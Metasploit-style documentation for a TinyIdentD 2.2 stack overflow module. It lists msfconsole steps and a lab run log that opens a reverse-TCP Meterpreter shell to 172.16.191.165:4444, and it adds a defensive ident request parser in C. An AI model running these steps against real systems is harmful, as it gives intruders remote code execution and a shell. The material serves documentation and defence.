Vulnerable Application
This module exploits a stack-based buffer overflow in TinyIdentD version 2.2.
If we send a long string to the ident service, we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
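A defensive counterpart to the overflow described above, as an added example that is not TinyIdentD's code or part of the module: an ident (RFC 1413) query parser that rejects over-long input by length before parsing and never copies the request into a fixed-size stack buffer. The function names and the 32-byte ceiling are assumptions made for illustration.

```c
#include <stddef.h>

/* Assumption: a valid RFC 1413 query is two ports, a comma, optional blanks
   and an EOL, so 32 bytes is a generous ceiling. */
#define IDENT_MAX_REQ 32

static void skip_blanks(const char **p, const char *end)
{
    while (*p < end && (**p == ' ' || **p == '\t')) (*p)++;
}

/* Parse a decimal port (1..65535) at *p, advancing *p; returns 0 on error. */
static unsigned parse_port(const char **p, const char *end)
{
    unsigned v = 0;
    int digits = 0;
    while (*p < end && **p >= '0' && **p <= '9' && digits < 5) {
        v = v * 10 + (unsigned)(**p - '0');
        (*p)++;
        digits++;
    }
    return (digits > 0 && v <= 65535) ? v : 0;
}

/* Returns 0 and fills both ports for a well-formed query, -1 otherwise.
   Operates on (buf, len) as received; nothing is copied to a fixed buffer. */
int ident_parse_request(const char *buf, size_t len,
                        unsigned *server_port, unsigned *client_port)
{
    if (buf == NULL || len == 0 || len > IDENT_MAX_REQ)
        return -1;                 /* over-long input is rejected before parsing */
    const char *p = buf, *end = buf + len;
    skip_blanks(&p, end);
    unsigned a = parse_port(&p, end);
    skip_blanks(&p, end);
    if (a == 0 || p >= end || *p++ != ',')
        return -1;
    skip_blanks(&p, end);
    unsigned b = parse_port(&p, end);
    skip_blanks(&p, end);
    if (b == 0)
        return -1;
    if (p < end && *p == '\r') p++;          /* optional CR before LF */
    if (p >= end || *p != '\n' || p + 1 != end)
        return -1;                 /* anything but a single trailing EOL fails */
    *server_port = a;
    *client_port = b;
    return 0;
}
```

The same length ceiling can serve as a detection rule for traffic to the ident port (113): a request longer than a port pair and an EOL is not a valid query.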
Download:
Verification Steps
- Start msfconsole
- use exploit/windows/misc/tiny_identd_overflow
- set RHOSTS <rhost>
- set TARGET <target>
- run
- You should get a new session
Options
Scenarios
TinyIdentD 2.2 on Windows XP SP0 - English (x86)
msf5 > use exploit/windows/misc/tiny_identd_overflow
msf5 exploit(windows/misc/tiny_identd_overflow) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Windows 2000 Server SP4 - English
2 Windows 2000 Pro All - English
3 Windows 2000 Pro All - Italian
4 Windows 2000 Pro All - French
5 Windows XP SP0/1 - English
6 Windows XP SP2 - English
7 Windows XP SP2 - Italian
msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
target => 5
msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
rhosts => 172.16.191.140
msf5 exploit(windows/misc/tiny_identd_overflow) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
[*] Sending stage (176195 bytes) to 172.16.191.140
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400
meterpreter > sysinfo
Computer : WINXP
OS : Windows XP (5.1 Build 2600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >